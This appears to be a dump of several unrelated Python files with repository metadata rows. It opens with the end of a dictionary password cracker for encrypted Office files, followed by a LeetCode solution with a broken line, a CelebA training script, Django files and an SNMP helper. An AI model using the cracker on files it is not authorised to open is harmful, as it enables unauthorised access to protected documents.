def main(argv):
inputfile = ''
doCommonPasswordChecks = False
verbose = False
customList = False
try:
opts, args = getopt.getopt(argv,"hi:cvl:",["ifile=", "common", "verbose", "list="])
except getopt.GetoptError:
print ('doc-break.py -i <inputfile>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print ('doc-break.py -i <inputfile> -c -v -l <listfile>')
print ('| -i | Required | <input file> | Will use that file as the one to open | Somefile.docx')
print ('| -c | Optional | None | Use the 10000 common list | ')
print ('| -v | Optional | None | Will spam console with info | ')
print ('| -l | Optional | <input file> | Will use the file as the password list | Password.txt ')
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-v", "--verbose"):
verbose = True
elif opt in ("-c", "--common"):
doCommonPasswordChecks = True
elif opt in ("-l", "--list"):
customList = arg
if inputfile == '':
print ('No file passed.')
print ('doc-break.py -i <inputfile>')
sys.exit()
exists = os.path.isfile(inputfile)
if not exists:
print ('Failed to find file. Please check your file location: ')
print (inputfile)
sys.exit()
fh = msoffcrypto.OfficeFile(open(inputfile, "rb"))
found = False
if doCommonPasswordChecks:
exists = os.path.isfile("10000-password-top-list.txt")
if not exists:
download_PasswordList()
common_passwords = open('10000-password-top-list.txt')
currentLine = 1
print ("Checking against the 10000 common password list")
for line in common_passwords:
if verbose:
print ('Trying "' + line.rstrip() + '"')
print ( str(currentLine) + '/' + str(10000))
if breakFile(fh, line.rstrip()):
break
currentLine = currentLine+1
common_passwords.close()
if customList:
exists = os.path.isfile(customList)
if not exists:
print ('Could not find list "' + customList + '" Please check your file')
sys.exit()
password_list = open(customList)
#this is ugly. I know
linecount = 0
for line in password_list:
linecount = linecount+1
password_list.close()
password_list = open(customList)
linecount = str(linecount)
currentLine = 1
for line in password_list:
if verbose:
print ('Trying "' + line.rstrip() + '"')
print ( str(currentLine) + '/' + linecount)
if breakFile(fh, line.rstrip()):
break
currentLine = currentLine+1
password_list.close()
print ('Could not find the password. Perhaps try a larger list')
if __name__ == "__main__":
main(sys.argv[1:])
| [
"andreblue2u@live.com"
] | andreblue2u@live.com |
f9856b6be880ab2550bdebc36c6b1103c01b7923 | 3cf5f15725ea0904d8ca0f212c2c42ad95397410 | /480/main.py | 20fe107202ce1d5b2d1ff2d3e3bbf789f54a45a9 | [] | no_license | zxch3n/Leetcode | e7cd26395630fc43852224d6b50d7c870b839fa6 | d5c2378979c2db6ab8f0a3eecd98737a2a974e53 | refs/heads/master | 2021-09-05T08:03:45.272515 | 2018-01-25T13:37:32 | 2018-01-25T13:37:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,639 | py | # -*- coding: utf-8 -*-
"""
@author: Rem
@contack: remch183@outlook.com
@time: 2017/02/21/ 21:39
"""
__author__ = "Rem"
class TreeNode():
def __init__(self, f, v):
self.v = v
self.f = f
self.l = None
self.r = None
self.ln = 0
self.rn = 0
def __repr__(self):
return str(self.v) + '{%s %s}' % (str(self.l), str(self.r))
def findKth(self, k):
if self.ln == k - 1:
return self.v
if self.ln > k - 1:
return self.l.findKth(k)
return self.r.findKth(k - 1 - self.ln)
def insert(self, v):
if v <= self.v:
self.ln += 1
if self.l is None:
self.l = TreeNode(self, v)
else:
return self.l.insert(v)
else:
self.rn += 1
if self.r is None:
self.r = TreeNode(self, v)
else:
return self.r.insert(v)
def popRightMost(self):
if self.r:
if not self.r.r:
t = self.r.v
self.r =
return t
return self.r.popRightMost()
t = self.v
self.f.l = None
return t
def popLeftMost(self):
if self.l:
if not self.l.l:
t = self.l.v
self.l = None
return t
return self.l.popLeftMost()
t = self.v
self.f.r = None
return t
def remove(self, v):
if self.v == v:
if self.l:
self.v = self.l.popRightMost()
self.ln -= 1
else:
self.v = self.r.popLeftMost()
self.rn -= 1
return
if self.v > v:
self.ln -= 1
return self.l.remove(v)
else:
self.rn -= 1
return self.r.remove(v)
@staticmethod
def findMedian(root, n):
if n & 1:
return root.findKth((n + 1) // 2)
return (root.findKth(n // 2) + root.findKth(n // 2 + 1)) / 2
class Solution:
def medianSlidingWindow(self, nums, k):
root = TreeNode(None, nums[0])
for i in range(1, k):
root.insert(nums[i])
ans = []
for i in range(k, len(nums)):
print(root)
ans.append(TreeNode.findMedian(root, k))
root.remove(nums[i - k])
root.insert(nums[i])
print(root)
ans.append(TreeNode.findMedian(root, k))
return ans
def test(*args):
s = Solution()
print(s.medianSlidingWindow(*args))
test([1, 2, 3, 4, 5], 4)
| [
"remch183@outlook.com"
] | remch183@outlook.com |
08538abd543b41ee4eecc902a9b4ea375ebe66a3 | d971220d09d0c3c9866c1f1d98b85295e00ac2af | /painting_spliter.py | 03d23ae1c58eaa56151d908b7dfc0ecb43d5d6f7 | [] | no_license | j0sephmerheb/python_art_gallery | a716a22f0d82d73502d458d4c5d1c003618589bc | 51521ae7fb59ac3b5385bcf6e5310b95304114d0 | refs/heads/master | 2022-08-03T10:38:17.774192 | 2020-05-22T09:38:15 | 2020-05-22T09:38:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,715 | py |
# coding: utf-8
# ### Students: Anh Tu NGUYEN - Joseph MERHEB - Sita SHRESTHA
# In[13]:
class Reader:
def __init__(self, input_file):
self.input_file = input_file;
self.portrait_list = '';
self.landscape_list = '';
self.new_text = '';
file = open(input_file, "r");
lines = file.readlines()[1:];
i = 0;
for line in lines:
self.new_text += str(i) + ' ' + line;
i += 1;
file.close()
def paint_split(self):
for line in self.new_text.splitlines():
pType = line.split(' ')[1];
if (pType == 'P'):
self.portrait_list += line + '\n';
elif (pType == 'L'):
self.landscape_list += line + '\n';
result = self.landscape_list + self.portrait_list;
return result;
def portrait_combiner(self):
p_list = self.portrait_list.splitlines();
result = '';
for line in self.landscape_list.splitlines():
l_id = line.split(' ')[0];
result += str(l_id) + ' ';
tags = line.split(' ')[3:];
for tag in tags:
if (tag == tags[-1]):
result += tag + '\n'
else: result += tag + ' ';
for i in range(0, int(len(p_list)/2)):
p1_id = p_list[i].split(' ')[0];
p2_id = p_list[len(p_list)-1-i].split(' ')[0];
p1_tags = p_list[i].split(' ')[3:];
p2_tags = p_list[len(p_list)-1-i].split(' ')[3:];
tag_list = list(set(p1_tags) | set(p2_tags));
result += str(p1_id) + ',' + str(p2_id) + ' ';
for tag in tag_list:
if (tag == tag_list[-1]):
result += tag + '\n'
else: result += tag + ' ';
file = open("simple_file.txt", "w")
file.write(result);
file.close();
return result;
# Other method for ordering the frameglasses
# def order_frame(self):
# full_list = self.portrait_combiner();
# frame_score_dict = {}
# frame_list = full_list.splitlines();
# completed_frame_dict = {};
# used_frame_list = [];
# for i in range(0,len(frame_list)):
# if (i<len(frame_list)-1):
# f1_id = frame_list[i].split(' ')[0];
# f1_tags = frame_list[i].split(' ')[1:];
# for j in range(i+1,len(frame_list)):
# f2_id = frame_list[j].split(' ')[0];
# f2_tags = frame_list[j].split(' ')[1:];
# common_tags = len(set(f1_tags) & set(f2_tags));
# f1_tag_only = len(set(f1_tags) - set(f2_tags));
# f2_tag_only = len(set(f2_tags) - set(f1_tags));
# frame_score = min(common_tags, f1_tag_only, f2_tag_only);
# frame_score_dict[f1_id + '-' + f2_id] = frame_score;
# max_score_frame = max(frame_score_dict, key=frame_score_dict.get);
# max_score = max(frame_score_dict.values());
# completed_frame_dict[max_score_frame] = max_score;
# for frame in max_score_frame.split('-'):
# if ',' in frame:
# for f in frame.split(','):
# if f not in used_frame_list:
# used_frame_list.append(f);
# else:
# if frame not in used_frame_list:
# used_frame_list.append(frame);
# frame_score_dict.clear();
# output = '';
# for key in completed_frame_dict.keys():
# for k in key.split('-'):
# if ',' in k:
# k = k.replace(',',' ')
# if k not in output:
# output += k + '\n'
# else:
# if k not in output:
# output += str(k) + '\n'
# output = str(output.count('\n')) + '\n' + output
# # print(output)
# file = open("output_" + self.input_file, "w")
# file.write(output);
# file.close();
# In[15]:
import argparse
def main():
parser = argparse.ArgumentParser()
parser.add_argument("input", type=str)
args = parser.parse_args()
reader = Reader(args.input)
reader.paint_split();
reader.portrait_combiner();
# reader.order_frame();
if __name__ == "__main__":
main()
# reader = Reader("../0_example.txt");
# reader.paint_split();
# reader.order_frame();
# print(reader.portrait_list);
# print(reader.portrait_combiner());
| [
"joseph@merheb.net"
] | joseph@merheb.net |
fc634bba5340c74cb6a09b7f1f12da4e18979c57 | f2772c7e8f74d521d839c75a02d27f1a9457e695 | /main.py | 23fb379db5d8ddf2f1d2f324715f48ddfb953577 | [
"MIT"
] | permissive | sodaprairie0x0/Celeba-attributes-prediction | 6f8bfd87539f38189e8029709ec8dea5614f091d | c97fdf2c926eab137e7b6938659a877d3b7dc3f5 | refs/heads/main | 2022-12-31T11:26:59.996240 | 2020-10-21T08:06:19 | 2020-10-21T08:06:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,695 | py | import os
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import numpy as np
import torchvision
from torchvision import datasets, models, transforms
import time
import os
import copy
from random import randint
from celeba import CelebA
from utils import *
from loss import FocalLoss
args = parser()
def main():
print('model settings:\n', args)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print('training with device:', device)
# 1. load the datasets
train_loader, val_loader, test_loader = dataloaders()
#show number of positive attributes
print(positive_attributes(train_loader.dataset))
print(positive_attributes(val_loader.dataset))
print(positive_attributes(test_loader.dataset))
# 2. retrieve the pretrained model
model = load_model()
#if resume is true, load the previously save checkpoint
if args.resume:
print('resume from last checkpoint')
state_dict = torch.load(args.root+'checkpoints/'+args.checkpoint)
model.load_state_dict(state_dict)
model.to(device)
#freeze conv layer parameters if args.train_conv is false, other wise set requires_grad=True
for params in model.parameters():
params.requires_grad = args.train_conv
if args.train_conv:
parameters = model.parameters()
else:
parameters = model.fc.parameters()
# 3. train and validate the model
if args.loss == 'bce':
criterion = nn.BCEWithLogitsLoss()
elif args.loss == 'focal':
criterion = FocalLoss(alpha=args.alpha, gamma=args.gamma)#alpha=1 means no emphasis on 0 or 1, smaller gamma means less emphasis on minor probs
optimizer = optim.SGD(parameters, lr=args.lr, momentum=0.9)
scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=3, gamma=0.5)
print('model training starts:')
# 4. test model accuracy on test set
if args.test_mode:
test(model, test_loader, criterion, device)
else:
model = train_validate(model, criterion, optimizer, scheduler, train_loader, val_loader, device)
test(model, test_loader, criterion, device)
def train_validate(model, criterion, optimizer, scheduler, train_loader, val_loader, device, validate=True):
start = time.time()
best_weights = copy.deepcopy(model.state_dict())
best_acc = 0.0
current_lr = optimizer.state_dict()['param_groups'][0]['lr']
epoches = args.epoches
for epoch in range(0, epoches):
print('epoch', epoch + 1, '/', epoches, '\tlearning rate',current_lr )
running_loss = train_acc = 0
for x, y in train_loader:
x, y = x.to(device), y.to(device)
model.train()
optimizer.zero_grad()
x.requires_grad_()
s = model(x)
loss = criterion(s, y.float())
loss.backward()
optimizer.step()
running_loss += loss.detach().item() * x.size(0)
train_acc += batch_accuracy(s.detach(), y)[0]
running_loss /= len(train_loader.dataset)
train_acc /= len(train_loader.dataset)
print('time elapsed:%d s ' % (time.time() - start))
print('running loss:\t', running_loss, 'training accuracy:\t', train_acc * 100)
scheduler.step()
if validate: # validation if set true
with torch.no_grad():
running_loss = val_acc = 0
for x, y in val_loader:
x, y = x.to(device), y.to(device)
model.eval()
s = model(x)
loss = criterion(s, y.float())
running_loss += loss.detach().item() * x.size(0)
val_acc += batch_accuracy(s.detach(), y)[0]
running_loss /= len(val_loader.dataset)
val_acc /= len(val_loader.dataset)
print('validation loss:\t', running_loss, 'validation accuracy:\t', val_acc * 100)
# copy model weights if test accuracy improves
if val_acc > best_acc:
best_acc = val_acc
best_weights = copy.deepcopy(model.state_dict())
torch.save(best_weights, args.root + 'checkpoints/'+args.checkpoint)
elif val_acc < best_acc - 0.01: # if validation accuracy drops by 1%, stop the rounds
print('validation accuracy is not improving at {} epoches, stop early here'.format(epoch))
break
print('best accuracy', best_acc * 100)
# load best weights
model.load_state_dict(best_weights)
return model
def test(model, loader, criterion, device):
state_dict = torch.load(args.root + 'checkpoints/'+args.checkpoint)
model.load_state_dict(state_dict)
start = time.time()
with torch.no_grad():
running_loss = test_accuracy = 0
attr_accuracy = torch.zeros(40).to(device)
for x, y in loader:
x, y = x.to(device), y.to(device)
model.eval()
s = model(x)
loss = criterion(s, y.float())
running_loss += loss.detach().item() * x.size(0)
test_accuracy += batch_accuracy(s.detach(), y)[0]
#attr_acc need to be on cuda for computation
attr_accuracy += batch_accuracy(s.detach(), y)[1]
running_loss /= len(loader.dataset)
test_accuracy /= len(loader.dataset)
attr_accuracy /= len(loader.dataset)
print('time elapsed:%d s ' % (time.time() - start))
print('test loss:\t', running_loss, 'test accuracy:\t', test_accuracy * 100)
print('accuracy per attribute\n', attr_accuracy)
print(rank(attr_accuracy))
return test_accuracy, attr_accuracy
def output_labels(model, loader):
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
with torch.no_grad():
running_loss = test_accuracy = 0
arr = torch.zeros((1, 40))
for x, y in loader:
x, y = x.to(device), y.to(device)
model.eval()
s = model(x)
preds = torch.sigmoid(s).round() # prob 0.5 is 1
preds = preds * 2 - 1
arr = np.concatenate((arr, preds.cpu()), axis=0)
return arr[1:]
def test_unlabelled():
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
#load data
final_data = datasets.ImageFolder(args.root + 'test_data/', transform=transforms.Compose([
transforms.Resize((178, 178)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
]))
final_loader = torch.utils.data.DataLoader(final_data, shuffle=False, batch_size=32)
#load model architecture and load parameters from checkpoint
model = load_model()
state_dict = torch.load(args.root+'checkpoints/'+args.checkpoint)
model.load_state_dict(state_dict)
model.to(device)
print('Predicting labels for the private test data')
labels = output_labels(model, final_loader)
# save in case code breaks
torch.save(labels,'labels.pt')
np.savetxt("predictions.txt", labels, fmt='%d', footer='\n', comments='')
img_names = os.listdir(args.root+'test_data/13233_imgs/')
file = "predictions.txt"
with open(file, 'r') as f:
lines = [' '.join([img, x.strip()+'\n']) for x, img in zip(f.readlines(), img_names)]
with open(file, 'w') as f:
f.writelines(lines)
print('labels has been saved in the "predictions.txt" in the current directory')
if __name__ == '__main__':
if args.test_unlabelled:
test_unlabelled()
else:
main()
| [
"aprilgng@gmail.com"
] | aprilgng@gmail.com |
8cc1dfe36365b07007f5930cd5143387e3556979 | 95932a51c20b91d32e609d3660a1b5be24df89ea | /utils/__init__.py | 6c2f202869f20d81f090cd577f902cc5074661fa | [
"MIT"
] | permissive | XiaohangZhan/Switchable-Whitening | ea176a9d64ca58d4e43f500aead35b2303740c5c | 8369d884af907495dc1f67f9c5d47d2d712ddffa | refs/heads/master | 2020-09-01T08:37:52.321472 | 2019-10-23T05:14:00 | 2019-10-23T05:14:00 | 218,922,053 | 0 | 0 | MIT | 2019-11-01T05:54:36 | 2019-11-01T05:54:36 | null | UTF-8 | Python | false | false | 60 | py | from .common_utils import *
from .distributed_utils import * | [
"xingangpan1994@gmail.com"
] | xingangpan1994@gmail.com |
03fcf0fdd9e8c379eaed44a632ac506afab87888 | 53ab3451fba139c002b631ff33aaf8b4e3c53628 | /Strike/Mission.py | 7fa00b3218eac5321078393d27b686ec9f5d28cb | [] | no_license | GreyPredator/DroneSimulation | c09eac5432f5be8cc647df408b5441c006afb2f2 | b20eba5734b373f403ed2739f5db70daa8a01df7 | refs/heads/master | 2020-03-08T10:59:47.560385 | 2018-08-18T18:25:57 | 2018-08-18T18:25:57 | 127,912,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 59 | py |
class Mission:
def __init__(self):
pass | [
"noreply@github.com"
] | noreply@github.com |
28952444eae1d539b344fe6d8e4f677565bf2bda | c86de1ee41895651d274f9d08d39db77af9ebd5f | /WhatToWear/news/migrations/0004_auto_20200110_1350.py | f4fedcd4428ea9af1dd8c99125c75ff6fad8e132 | [] | no_license | mayorov-andrey/WhatToWear | 5577b87059f77e088bbe312ddd498d6f4cd1077f | 6738a674d19204ed30ed30a354d5647885a5fff7 | refs/heads/master | 2020-12-29T15:19:51.270813 | 2020-02-08T11:57:34 | 2020-02-08T11:57:34 | 238,651,475 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | # Generated by Django 2.2.7 on 2020-01-10 10:50
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('news', '0003_auto_20200109_1917'),
]
operations = [
migrations.AlterField(
model_name='new',
name='posted',
field=models.DateTimeField(db_index=True, default=datetime.datetime(2020, 1, 10, 13, 50, 15, 383554), verbose_name='Опубликована'),
),
]
| [
"58735025+mayorov-andrey@users.noreply.github.com"
] | 58735025+mayorov-andrey@users.noreply.github.com |
ecae1e41c1a4dbea1e9f916e518c7a30df863ebe | bc9f66258575dd5c8f36f5ad3d9dfdcb3670897d | /lib/third_party/google/cloud/pubsublite_v1/types/topic_stats.py | 1ad03e069c7d8a1f576f2e229fdb25414030148e | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | google-cloud-sdk-unofficial/google-cloud-sdk | 05fbb473d629195f25887fc5bfaa712f2cbc0a24 | 392abf004b16203030e6efd2f0af24db7c8d669e | refs/heads/master | 2023-08-31T05:40:41.317697 | 2023-08-23T18:23:16 | 2023-08-23T18:23:16 | 335,182,594 | 9 | 2 | NOASSERTION | 2022-10-29T20:49:13 | 2021-02-02T05:47:30 | Python | UTF-8 | Python | false | false | 5,658 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.pubsublite_v1.types import common
from cloudsdk.google.protobuf import timestamp_pb2 # type: ignore
__protobuf__ = proto.module(
package="google.cloud.pubsublite.v1",
manifest={
"ComputeMessageStatsRequest",
"ComputeMessageStatsResponse",
"ComputeHeadCursorRequest",
"ComputeHeadCursorResponse",
"ComputeTimeCursorRequest",
"ComputeTimeCursorResponse",
},
)
class ComputeMessageStatsRequest(proto.Message):
r"""Compute statistics about a range of messages in a given topic
and partition.
Attributes:
topic (str):
Required. The topic for which we should
compute message stats.
partition (int):
Required. The partition for which we should
compute message stats.
start_cursor (google.cloud.pubsublite_v1.types.Cursor):
The inclusive start of the range.
end_cursor (google.cloud.pubsublite_v1.types.Cursor):
The exclusive end of the range. The range is empty if
end_cursor <= start_cursor. Specifying a start_cursor before
the first message and an end_cursor after the last message
will retrieve all messages.
"""
topic = proto.Field(proto.STRING, number=1,)
partition = proto.Field(proto.INT64, number=2,)
start_cursor = proto.Field(proto.MESSAGE, number=3, message=common.Cursor,)
end_cursor = proto.Field(proto.MESSAGE, number=4, message=common.Cursor,)
class ComputeMessageStatsResponse(proto.Message):
r"""Response containing stats for messages in the requested topic
and partition.
Attributes:
message_count (int):
The count of messages.
message_bytes (int):
The number of quota bytes accounted to these
messages.
minimum_publish_time (google.protobuf.timestamp_pb2.Timestamp):
The minimum publish timestamp across these
messages. Note that publish timestamps within a
partition are not guaranteed to be
non-decreasing. The timestamp will be unset if
there are no messages.
minimum_event_time (google.protobuf.timestamp_pb2.Timestamp):
The minimum event timestamp across these
messages. For the purposes of this computation,
if a message does not have an event time, we use
the publish time. The timestamp will be unset if
there are no messages.
"""
message_count = proto.Field(proto.INT64, number=1,)
message_bytes = proto.Field(proto.INT64, number=2,)
minimum_publish_time = proto.Field(
proto.MESSAGE, number=3, message=timestamp_pb2.Timestamp,
)
minimum_event_time = proto.Field(
proto.MESSAGE, number=4, message=timestamp_pb2.Timestamp,
)
class ComputeHeadCursorRequest(proto.Message):
r"""Compute the current head cursor for a partition.
Attributes:
topic (str):
Required. The topic for which we should
compute the head cursor.
partition (int):
Required. The partition for which we should
compute the head cursor.
"""
topic = proto.Field(proto.STRING, number=1,)
partition = proto.Field(proto.INT64, number=2,)
class ComputeHeadCursorResponse(proto.Message):
r"""Response containing the head cursor for the requested topic
and partition.
Attributes:
head_cursor (google.cloud.pubsublite_v1.types.Cursor):
The head cursor.
"""
head_cursor = proto.Field(proto.MESSAGE, number=1, message=common.Cursor,)
class ComputeTimeCursorRequest(proto.Message):
r"""Compute the corresponding cursor for a publish or event time
in a topic partition.
Attributes:
topic (str):
Required. The topic for which we should
compute the cursor.
partition (int):
Required. The partition for which we should
compute the cursor.
target (google.cloud.pubsublite_v1.types.TimeTarget):
Required. The target publish or event time.
Specifying a future time will return an unset
cursor.
"""
topic = proto.Field(proto.STRING, number=1,)
partition = proto.Field(proto.INT64, number=2,)
target = proto.Field(proto.MESSAGE, number=3, message=common.TimeTarget,)
class ComputeTimeCursorResponse(proto.Message):
r"""Response containing the cursor corresponding to a publish or
event time in a topic partition.
Attributes:
cursor (google.cloud.pubsublite_v1.types.Cursor):
If present, the cursor references the first message with
time greater than or equal to the specified target time. If
such a message cannot be found, the cursor will be unset
(i.e. ``cursor`` is not present).
"""
cursor = proto.Field(proto.MESSAGE, number=1, message=common.Cursor,)
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"cloudsdk.mirror@gmail.com"
] | cloudsdk.mirror@gmail.com |
fd0a6ba9360c28449fd6b0848a7aecadab2791fb | 1e998b8aa40e29dd21e97b1071fc5dc46d4746c2 | /example/example/urls.py | 3f3d7176338ff3f5b14369d3c51078945a69d240 | [
"MIT"
] | permissive | PragmaticMates/django-templates-i18n | 61786d0e3daf304316609fbf17f87f27457fdaae | 0dac1b8da498dc414d4836c1cf6cb82cb1597c26 | refs/heads/master | 2016-09-06T15:47:46.161242 | 2014-09-26T12:14:02 | 2014-09-26T12:14:02 | 22,213,677 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | from django.conf.urls import include, url
from django.conf.urls.i18n import i18n_patterns
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
from views import HomeView, MyView
admin.autodiscover()
urlpatterns = i18n_patterns('',
# Uncomment the admin/doc line below to enable admin documentation:
url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
# Examples:
url(r'^my-view/$', MyView.as_view(), name='my_view'),
url(r'^$', HomeView.as_view(), name='home'),
)
| [
"erik.telepovsky@gmail.com"
] | erik.telepovsky@gmail.com |
3b43b227b7faa549f674979711bdaec0a30fe8d9 | aaf7e8f9ec5856241930c98167071e424967b486 | /src/lib/glfs-web/app/snmp.py | f9fa73d88593c3e76f64161535626ffe193a8b58 | [] | no_license | ShenDezhou/PyCRM | e32826d143598227910c6a13bbc70140ec7f56d2 | 36b9411d9d5372b59fed00afdbc74607fb010df9 | refs/heads/master | 2022-02-10T02:29:45.876818 | 2018-06-17T10:09:43 | 2018-06-17T10:09:43 | 72,261,079 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 250 | py | import netsnmp
def snmp_query(oid, dest_host, community,version=2):
varbind = netsnmp.Varbind(oid)
result = netsnmp.snmpwalk(varbind, Version=version,
DestHost=dest_host, Community=community)
return result
| [
"bangtech@sina.com"
] | bangtech@sina.com |
191a89e669e5fe009d41c0ba2a0ba203049cadab | b23c01fa8d96871bb2e3f56c52cd97b85cb4966a | /bin/easy_install | f93562d323772eae2324c1cd8b04239c434042e3 | [] | no_license | denyherianto/88spares-account-django | 00413ae78f4cd6ac7c0574091f3decd32e110381 | 94adba9197c71cf84486f6f3c5eba7ccc201a066 | refs/heads/master | 2021-08-15T06:53:49.707136 | 2017-11-17T15:10:08 | 2017-11-17T15:10:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | #!/mnt/d/devs/repo/python/django_test/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"deny.hrnt@gmail.com"
] | deny.hrnt@gmail.com | |
e911966219e03ac805ec70a13721b29ec8e85374 | 79b9965006b2aed0d85db23ab5551baf20379d29 | /Days/Day23_Calculator/Day23_Calculator.py | e833e312c06e326aa692b3f0824bbd58c61a7eac | [] | no_license | gervanna/100daysofcode | f7ef3087ab50dbf3869606d771906a4103002b1e | deaebce1e8d98b7d5b474facca5a5c2c45872886 | refs/heads/main | 2023-06-17T00:47:27.772161 | 2021-07-09T01:26:11 | 2021-07-09T01:26:11 | 315,077,257 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,090 | py | import os
from calc_art import logo
def add(n1, n2):
return n1 + n2
def subtract(n1, n2):
return n1 - n2
def multiply(n1, n2):
return n1 * n2
def divide(n1, n2):
return n1 / n2
operations = {"+" : add,
"-" : subtract,
"*" : multiply,
"/" : divide,
}
def calculator():
print(logo)
unvalidated_first_num = True
while unvalidated_first_num:
try:
num1 = float(input("\nType the first number? "))
unvalidated_first_num = False
except:
print("That's not a number.")
continue
for sign in operations:
print (sign)
go_again = True
while go_again == True:
unvalidated_operation = True
while unvalidated_operation:
operation_sign = input("\nPick an operation: ")
if operation_sign not in operations:
print("Choose a valid operation.")
continue
else:
unvalidated_operation = False
unvalidated_second_num = True
while unvalidated_second_num:
try:
num2 = float(input("\nType the next number? "))
if operation_sign == "/" and num2 == 0:
raise ZeroDivisionError #throw an error
unvalidated_second_num = False
except ValueError:
print("That's not a number.")
continue
except ZeroDivisionError:
print("Cannot divide by Zero.")
continue
calc = operations[operation_sign]
answer = calc(num1, num2)
print(f"\n{num1} {operation_sign} {num2} = {answer}")
next_calc = input(f"\nType 'y' to continue calculations with {answer}, or type 'n' to start a new calculation, else type 'e' to exit the Calculator: ").lower()
if next_calc == 'y':
num1 = answer
elif next_calc == 'e':
break
else:
go_again = False
os.system('clear')
calculator()
print("\nGoodbye.")
calculator() | [
"stephenslavern@gmail.com"
] | stephenslavern@gmail.com |
f04fded2fc33732e2058d245b2bf7265fd3e890c | 24698622d602c78a95fded3642bb81f510f8a6f7 | /Dataset.py | 3e52cb4716f5e9f8c2507e01de181103299653f4 | [] | no_license | shyamsn97/TalkingFaceModels | 781e66b1907ba62d949eb8a960c320e3235c7685 | 1e3f090615048890cce6ca454cd657dbb63b094f | refs/heads/master | 2020-06-04T12:02:36.082069 | 2019-07-30T19:58:45 | 2019-07-30T19:58:45 | 192,013,747 | 0 | 0 | null | 2019-07-30T19:58:46 | 2019-06-14T22:51:53 | Python | UTF-8 | Python | false | false | 2,222 | py | import numpy as np
import skimage
import cv2
from data_processing import *
from torch.utils.data import Dataset
from torch.utils.data import DataLoader
class MetaDataset(Dataset):
def __init__(self,reshaped_frame_sequences,landmark_frame_sequences,num_videos,k):
"""
Args
"""
self.reshaped_frame_sequences = reshaped_frame_sequences
self.landmark_frame_sequences = landmark_frame_sequences
self.video_sequence_names = sorted(list(self.reshaped_frame_sequences.keys()))
self.landmark_sequence_names = sorted(list(self.landmark_frame_sequences.keys()))
self.num_videos = num_videos
self.k = k
def __len__(self):
return len(self.video_sequence_names)
def __getitem__(self,index):
reshaped_frame_sequence = self.reshaped_frame_sequences[self.video_sequence_names[index]]
landmark_frame_sequence = self.landmark_frame_sequences[self.landmark_sequence_names[index]]
sequence_indices = range(len(reshaped_frame_sequence))
target_index = random.choice(sequence_indices)
sequence_indices = [i for i in sequence_indices if i != target_index]
sampled_vids = []
if self.k >= len(sequence_indices):
for i in sequence_indices:
sampled_vids.append((reshaped_frame_sequence[i],landmark_frame_sequence[i]))
else:
sampled_sequence_indices = random.sample(sequence_indices,self.k)
for i in sampled_sequence_indices:
sampled_vids.append((reshaped_frame_sequence[i],landmark_frame_sequence[i]))
target = (reshaped_frame_sequence[target_index],landmark_frame_sequence[target_index])
return target , sampled_vids
def makeDataloader(dataset,batch_size=1,shuffle=False,drop_last=True):
cuda = torch.cuda.is_available()
kwargs = {'num_workers':3, 'pin_memory':True} if cuda else {}
print ("gpu available :", cuda)
device = torch.device("cuda" if cuda else "cpu")
num_gpu = torch.cuda.device_count()
dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=shuffle, drop_last=drop_last, **kwargs)
return dataloader | [
"SSudhakaran@us.fujitsu.com"
] | SSudhakaran@us.fujitsu.com |
06c48cfb1fcdccc96982be21c4fd77acb14efe77 | 177e8944037da5d21bc325c2d4ecae149ba32d2a | /Blogapp/migrations/0008_auto_20200813_1726.py | 1ed1f66d10bd68dfda14f5587c60245ce3285cea | [] | no_license | priya-tech/My_Awesome_Blog | 42e054c4f9d60f8474355e96434ab16e9216e0aa | 24994cbafec9d1b891c572f7a647231d0b53f5d4 | refs/heads/master | 2023-02-13T01:23:19.948908 | 2021-01-08T05:54:36 | 2021-01-08T05:54:36 | 293,492,320 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | # Generated by Django 2.2.5 on 2020-08-13 17:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Blogapp', '0007_post_snippet'),
]
operations = [
migrations.AddField(
model_name='post',
name='header_image',
field=models.ImageField(blank=True, null=True, upload_to='images/'),
),
migrations.AlterField(
model_name='post',
name='snippet',
field=models.CharField(max_length=30),
),
]
| [
"priyavadhanisankar@gmail.com"
] | priyavadhanisankar@gmail.com |
